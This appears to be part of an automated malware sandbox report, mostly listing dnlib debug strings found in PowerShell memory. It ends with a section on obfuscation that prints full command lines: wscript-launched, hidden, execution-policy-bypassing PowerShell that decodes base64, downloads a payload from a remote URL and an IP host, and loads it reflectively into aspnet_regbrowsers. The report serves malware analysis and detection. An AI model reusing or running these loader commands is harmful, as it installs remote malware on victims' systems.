      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetCustomAttributeProps source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetFieldProps source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineParam source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetClassLayout source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteToken source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumPermissionSets source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumUnresolvedMethods source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineNestedType source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
      Source: Binary string: dnlib.DotNet.Pdb.Managed source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
      Source: Binary string: +dnlib.DotNet.Pdb.PdbWriter+<GetScopes>d__17 source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetRVA source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetModuleFromScope source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMethodImpl source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefinePinvokeMap source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetClassLayout source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineSecurityAttributeSet source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMemberRef source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPermissionSetProps source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetTypeDefProps source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineProperty source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindTypeDefByName source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetModuleProps source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldRVA source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumFieldsWithName source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMemberRefs source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.ResolveTypeRef source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SaveToStream source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMethodSemantics source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeDefProps source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
      Source: Binary string: egbrowsers.pdb source: aspnet_regbrowsers.exe, 00000011.00000002.490337170.0000000005DD0000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNestedClassProps source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMethod source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeletePinvokeMap source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetTokenFromTypeSpec source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetMethodImplFlags source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPinvokeMap source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumSignatures source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPinvokeMap source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldMarshal source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumUserStrings source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetRVA source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefinePermissionSet source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetMethodProps source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPropertyProps source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
      Source: Binary string: aspnet_regbrowsers.pdbl source: explorer.exe, 00000017.00000002.639143250.000000000878F000.00000004.80000000.00040000.00000000.sdmp, niLILOT.exe, 00000019.00000000.488929503.0000000000332000.00000020.00000001.01000000.0000000A.sdmp, mstsc.exe, 0000001B.00000002.638080396.00000000026CF000.00000004.10000000.00040000.00000000.sdmp, mstsc.exe, 0000001B.00000002.637568604.000000000037D000.00000004.00000020.00020000.00000000.sdmp, niLILOT.exe.17.dr
      Source: Binary string: dnlib.dotnet.pdb.managed source: powershell.exe, 0000000F.00000002.479528162.0000000000299000.00000004.00000800.00020000.00000000.sdmp
      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetUserString source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetInterfaceImplProps source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetFieldMarshal source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineTypeDef source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeDefs source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
      Source: Binary string: egbrowsers.pdbd source: aspnet_regbrowsers.exe, 00000011.00000002.490337170.0000000005DD0000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineImportMember source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumInterfaceImpls source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMemberProps source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineImportType source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
      Source: Binary string: System.Collections.Generic.IEnumerable<dnlib.DotNet.Pdb.PdbScope>.GetEnumerator source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetTokenFromSig source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumEvents source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetParamForMethodIndex source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineField source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.IsGlobal source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodsWithName source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetEventProps source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
      Source: FC830000.0.drInitial sample: OLE indicators vbamacros = False
      Source: PO.78NO9.xlsInitial sample: OLE indicators encrypted = True

      Data Obfuscation

      barindex
      Source: 17.2.aspnet_regbrowsers.exe.49a0000.6.raw.unpack, DyZNpLnfd9hpvhcF8H.cs.Net Code: dnso30Hnm5aN7ppryWg System.Reflection.Assembly.Load(byte[])
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "INVOKE-eXpRESSION( ('c'+'F1url = '+'fX'+'hhttps://ra'+'w'+'.github'+'userconte'+'nt.co'+'m/No'+'Dete'+'c'+'tOn/No'+'DetectOn'+'/refs/heads/main'+'/DetahN'+'oth-V.'+'txtf'+'X'+'h'+'; cF'+'1'+'bas'+'e'+'64Cont'+'ent'+' ='+' '+'(New-'+'Object '+'Syst'+'e'+'m.'+'N'+'et.WebC'+'li'+'en'+'t)'+'.DownloadStrin'+'g(cF1url);'+' cF'+'1bi'+'n'+'a'+'ryC'+'ontent = [Sy'+'stem.C'+'on'+'v'+'e'+'rt'+']'+'::Fro'+'mBase64Str'+'ing(cF1base64Co'+'nte'+'nt); cF1'+'a'+'ssembly = [R'+'eflecti'+'on.Ass'+'embly'+']:'+':Load(cF'+'1binary'+'Content); '+'['+'dnlib.IO.Home]::VAI(pNAt'+'x'+'t.RERC'+'CR/333/82.14.'+'042.83//:ptthpNA, pN'+'Adesa'+'tivadopNA, pNAdesati'+'vadop'+'NA,'+' pNAd'+'esativadopNA, pNAa'+'spnet_r'+'egbrowserspNA, pNAp'+'NA'+',pNAp'+'NA)').rePlaCe('fXh',[STrinG][Char]39).rePlaCe(([Char]99+[Char]70+[Char]49),[STrinG][Char]36).rePlaCe(([Char]112+[Char]78+[Char]65),[STrinG][Char]34))"
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "INVOKE-eXpRESSION( ('c'+'F1url = '+'fX'+'hhttps://ra'+'w'+'.github'+'userconte'+'nt.co'+'m/No'+'Dete'+'c'+'tOn/No'+'DetectOn'+'/refs/heads/main'+'/DetahN'+'oth-V.'+'txtf'+'X'+'h'+'; cF'+'1'+'bas'+'e'+'64Cont'+'ent'+' ='+' '+'(New-'+'Object '+'Syst'+'e'+'m.'+'N'+'et.WebC'+'li'+'en'+'t)'+'.DownloadStrin'+'g(cF1url);'+' cF'+'1bi'+'n'+'a'+'ryC'+'ontent = [Sy'+'stem.C'+'on'+'v'+'e'+'rt'+']'+'::Fro'+'mBase64Str'+'ing(cF1base64Co'+'nte'+'nt); cF1'+'a'+'ssembly = [R'+'eflecti'+'on.Ass'+'embly'+']:'+':Load(cF'+'1binary'+'Content); '+'['+'dnlib.IO.Home]::VAI(pNAt'+'x'+'t.RERC'+'CR/333/82.14.'+'042.83//:ptthpNA, pN'+'Adesa'+'tivadopNA, pNAdesati'+'vadop'+'NA,'+' pNAd'+'esativadopNA, pNAa'+'spnet_r'+'egbrowserspNA, pNAp'+'NA'+',pNAp'+'NA)').rePlaCe('fXh',[STrinG][Char]39).rePlaCe(([Char]99+[Char]70+[Char]49),[STrinG][Char]36).rePlaCe(([Char]112+[Char]78+[Char]65),[STrinG][Char]34))"Jump to behavior
      Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'SU5WT0tFLWVYcFJFU1NJT04oICgnYycrJ0YxdXJsID0gJysnZlgnKydoaHR0cHM6Ly9yYScrJ3cnKycuZ2l0aHViJysndXNlcmNvbnRlJysnbnQuY28nKydtL05vJysnRGV0ZScrJ2MnKyd0T24vTm8nKydEZXRlY3RPbicrJy9yZWZzL2hlYWRzL21haW4nKycvRGV0YWhOJysnb3RoLVYuJysndHh0ZicrJ1gnKydoJysnOyBjRicrJzEnKydiYXMnKydlJysnNjRDb250JysnZW50JysnID0nKycgJysnKE5ldy0nKydPYmplY3QgJysnU3lzdCcrJ2UnKydtLicrJ04nKydldC5XZWJDJysnbGknKydlbicrJ3QpJysnLkRvd25sb2FkU3RyaW4nKydnKGNGMXVybCk7JysnIGNGJysnMWJpJysnbicrJ2EnKydyeUMnKydvbnRlbnQgPSBbU3knKydzdGVtLkMnKydvbicrJ3YnKydlJysncnQnKyddJysnOjpGcm8nKydtQmFzZTY0U3RyJysnaW5nKGNGMWJhc2U2NENvJysnbnRlJysnbnQpOyBjRjEnKydhJysnc3NlbWJseSA9IFtSJysnZWZsZWN0aScrJ29uLkFzcycrJ2VtYmx5JysnXTonKyc6TG9hZChjRicrJzFiaW5hcnknKydDb250ZW50KTsgJysnWycrJ2RubGliLklPLkhvbWVdOjpWQUkocE5BdCcrJ3gnKyd0LlJFUkMnKydDUi8zMzMvODIuMTQuJysnMDQyLjgzLy86cHR0aHBOQSwgcE4nKydBZGVzYScrJ3RpdmFkb3BOQSwgcE5BZGVzYXRpJysndmFkb3AnKydOQSwnKycgcE5BZCcrJ2VzYXRpdmFkb3BOQSwgcE5BYScrJ3NwbmV0X3InKydlZ2Jyb3dzZXJzcE5BLCBwTkFwJysnTkEnKycscE5BcCcrJ05BKScpLnJlUGxhQ2UoJ2ZYaCcsW1NUcmluR11bQ2hhcl0zOSkucmVQbGFDZSgoW0NoYXJdOTkrW0NoYXJdNzArW0NoYXJdNDkpLFtTVHJpbkddW0NoYXJdMzYpLnJlUGxhQ2UoKFtDaGFyXTExMitbQ2hhcl03OCtbQ2hhcl02NSksW1NUcmluR11bQ2hhcl0zNCkp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "INVOKE-eXpRESSION( ('c'+'F1url = '+'fX'+'hhttps://ra'+'w'+'.github'+'userconte'+'nt.co'+'m/No'+'Dete'+'c'+'tOn/No'+'DetectOn'+'/refs/heads/main'+'/DetahN'+'oth-V.'+'txtf'+'X'+'h'+'; cF'+'1'+'bas'+'e'+'64Cont'+'ent'+' ='+' '+'(New-'+'Object '+'Syst'+'e'+'m.'+'N'+'et.WebC'+'li'+'en'+'t)'+'.DownloadStrin'+'g(cF1url);'+' cF'+'1bi'+'n'+'a'+'ryC'+'ontent = [Sy'+'stem.C'+'on'+'v'+'e'+'rt'+']'+'::Fro'+'mBase64Str'+'ing(cF1base64Co'+'nte'+'nt); cF1'+'a'+'ssembly = [R'+'eflecti'+'on.Ass'+'embly'+']:'+':Load(cF'+'1binary'+'Content); '+'['+'dnlib.IO.Home]::VAI(pNAt'+'x'+'t.RERC'+'CR/333/82.14.'+'042.83//:ptthpNA, pN'+'Adesa'+'tivadopNA, pNAdesati'+'vadop'+'NA,'+' pNAd'+'esativadopNA, pNAa'+'spnet_r'+'egbrowserspNA, pNAp'+'NA'+',pNAp'+'NA)').rePlaCe('fXh',[STrinG][Char]39).rePlaCe(([Char]99+[Char]70+[Char]49),[STrinG][Char]36).rePlaCe(([Char]112+[Char]78+[Char]65),[STrinG][Char]34))"
      Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'SU5WT0tFLWVYcFJFU1NJT04oICgnYycrJ0YxdXJsID0gJysnZlgnKydoaHR0cHM6Ly9yYScrJ3cnKycuZ2l0aHViJysndXNlcmNvbnRlJysnbnQuY28nKydtL05vJysnRGV0ZScrJ2MnKyd0T24vTm8nKydEZXRlY3RPbicrJy9yZWZzL2hlYWRzL21haW4nKycvRGV0YWhOJysnb3RoLVYuJysndHh0ZicrJ1gnKydoJysnOyBjRicrJzEnKydiYXMnKydlJysnNjRDb250JysnZW50JysnID0nKycgJysnKE5ldy0nKydPYmplY3QgJysnU3lzdCcrJ2UnKydtLicrJ04nKydldC5XZWJDJysnbGknKydlbicrJ3QpJysnLkRvd25sb2FkU3RyaW4nKydnKGNGMXVybCk7JysnIGNGJysnMWJpJysnbicrJ2EnKydyeUMnKydvbnRlbnQgPSBbU3knKydzdGVtLkMnKydvbicrJ3YnKydlJysncnQnKyddJysnOjpGcm8nKydtQmFzZTY0U3RyJysnaW5nKGNGMWJhc2U2NENvJysnbnRlJysnbnQpOyBjRjEnKydhJysnc3NlbWJseSA9IFtSJysnZWZsZWN0aScrJ29uLkFzcycrJ2VtYmx5JysnXTonKyc6TG9hZChjRicrJzFiaW5hcnknKydDb250ZW50KTsgJysnWycrJ2RubGliLklPLkhvbWVdOjpWQUkocE5BdCcrJ3gnKyd0LlJFUkMnKydDUi8zMzMvODIuMTQuJysnMDQyLjgzLy86cHR0aHBOQSwgcE4nKydBZGVzYScrJ3RpdmFkb3BOQSwgcE5BZGVzYXRpJysndmFkb3AnKydOQSwnKycgcE5BZCcrJ2VzYXRpdmFkb3BOQSwgcE5BYScrJ3NwbmV0X3InKydlZ2Jyb3dzZXJzcE5BLCBwTkFwJysnTkEnKycscE5BcCcrJ05BKScpLnJlUGxhQ2UoJ2ZYaCcsW1NUcmluR11bQ2hhcl0zOSkucmVQbGFDZSgoW0NoYXJdOTkrW0NoYXJdNzArW0NoYXJdNDkpLFtTVHJpbkddW0NoYXJdMzYpLnJlUGxhQ2UoKFtDaGFyXTExMitbQ2hhcl03OCtbQ2hhcl02NSksW1NUcmluR11bQ2hhcl0zNCkp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxDJump to behavior
